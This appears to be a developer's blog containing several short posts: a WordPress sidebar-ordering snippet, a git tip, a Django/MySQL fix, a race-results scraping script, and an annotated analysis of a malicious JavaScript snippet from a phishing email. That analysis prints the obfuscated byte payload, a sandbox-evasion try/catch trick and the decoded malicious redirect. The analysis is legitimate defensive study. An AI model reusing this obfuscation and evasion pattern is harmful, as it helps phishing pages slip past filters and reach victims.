WordPress has great docs

See those nicely ordered links in the sidebar?

“Projects, Mentions, Web Development Tools”

Thank the WordPress documentarians for that. This theme (wp_svbtle) doesn’t sort them by page_order by default. You have to add this snippet in its header.php.

$pagesArgs = Array(
    'sort_order' => 'ASC',
    'sort_column' => 'menu_order'
$pages = get_pages($pagesArgs);

I know this because the WordPress docs are phenomenal. Check it: http://codex.wordpress.org/Function_Reference/get_pages

This is a blueprint for every software project.

Default Usage
Params (with human-friendly explanations)
Return (way faster than inspecting in a debugger)
Example (contains multiple)
Source File (saves so much time if you want to read the code)
Related (similar functions, great for devs unfamiliar with the library)

Even the page is nicely formatted. WordPress deserves a hand. I know they had 10 years to get it right, but it’s still something to strive for.

Related: My buddy Alban tells of his sordid past with PHP.

Malicious JavaScript snippet

I got this snippet in an html file attached to a phishing email.

d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}

I’ve reformatted and annotated it for readability.

// hide redirect as ascii bytes
a = [0x78,0x63,0x74,0x33, etc...];

// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
    a[i] -= 2;

//detect if we're in a real browser
try {
	//throws exception because you can't increment a node
} catch(e) {
    // running in a real browser
    notInBrowser = 0;

try {
    //this throws an exception if we didn't throw an exception above
    //(notInBrowser will be undefined)
    notInBrowser &= 2
catch(e) {
    notInBrowser = 1;
// if we are in a browser, do the redirect
// remember 0 == false and 1 == true 
if (!notInBrowser) {

The decrypted code fed to the eval:

if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}

I’m not sure what was at the url. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.

This guy has a similar post that explains the document.body++.

Exclude a file from a git commit

I need to do this about once a week.

git update-index --assume-unchanged path/to/file.txt

git commit -a -m "MOBILE-1234: changed a bunch of files but excluded that one I'm saving for later."

git update-index --no-assume-unchanged path/to/file.txt

If you change 10 files but you only want to commit 9 this will do the trick.

TODO: Complete this git tutorial that blew up on HN a while back. http://pcottle.github.com/learnGitBranching/

Run Django from IntelliJ IDEA on OSX with MySQL

If you try to run a Django app from within Intellij using MySQL as the storage backend, you might get the following error.

django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module: dlopen(/Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib Referenced from: /Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so
 Reason: image not found

You’re missing the DYLD_LIBRARY_PATH environment variable.
In Intellij, go to “edit configurations”, and add this:

Cap 10k Race Data

What's the rush?

The Capitol 10,000 is a total friggin’ blast. Anyone with a remote interest in running should participate. Rarely do you get to run up the middle of the Congress bridge straight to the capitol through an unstoppable sea of humanity. On your way to the finish line you’ll pass spectators offering beer, bacon, and donuts.

Before you can catch your breath, they make the results available online. I’ve been looking for an opportunity to jump back into Python, so naturally I scraped the HTML and ran it through a script so people can play with the data.

Here’s how it went down.

Results are posted to mychiptime.com. They have some client-side JavaScript query their backend with your specified parameters. With a little help from Chrome’s developer console, I found their URL scheme. Use wget to download the data. It’s HTML that gets inserted directly into the page with a $(“#blah”).html(response).

wget http://www.mychiptime.com/searchResultGen.php?eID=3526&show=all"

The HTML returned by their API is truly hideous. A mere 20k rows cost 16MB… because they’re chock full of <b>, <font>, and “OnMouseOver”. After pulling out the relevant data, the file size is about 800KB.

Here’s the python script used to generate tab delimited .csv files from the HTML input. BeautifulSoup can take a few minutes to parse the larger files.

from bs4 import BeautifulSoup
#produce tab delimited CSV files from large html files
for year in range(2008, 2013):
	print 'processing ' + str(year)
	file = str(year) + '.html'
	f = open(file, 'r');

	html = f.read()
	soup = BeautifulSoup(html)
	table = soup.find("table")	

	#first row with column titles
	rows = table.findAll('tr')

	i = 0
	#write data to csv file
	outfile = str(year) + '.csv'
	out = open(outfile, 'w')
	this_row = ''
	for row in rows:
		cols = row.findAll('td')
		for col in cols:
			b = col.find('b')

			text = str(b.string)
			this_row += text
			this_row += '	'

		if i % 2 == 0:
			this_row += '\n'
			this_row = ''
		i += 1


Playing with the data

Building a simple scatterplot was way harder than it should have been. Google docs’ spreadsheet crashes when I try to build a chart. The Python library matplotlib chokes on the rows where Age is “None”. Wolfram Alpha rejects it, probably for the same reason. LibreOffice’s Spreadsheet just made my laptop really hot. Octave is inscrutable. But Plot for OSX did the job.

2012 Cap 10k

I’d like to see someone with MATLAB skills come up with some more advanced plots or divine some insight from the data. The columns available for 2012 are:

  • Name
  • Division Place
  • Gun Time
  • Chip Time
  • Overall Place
  • Age
  • Zip
  • Gen Place
  • Total Pace
  • Total Div
  • Total Gend
  • Tot AG

Here’s a zip archive of all the tab delimited CSV files 2008-2012.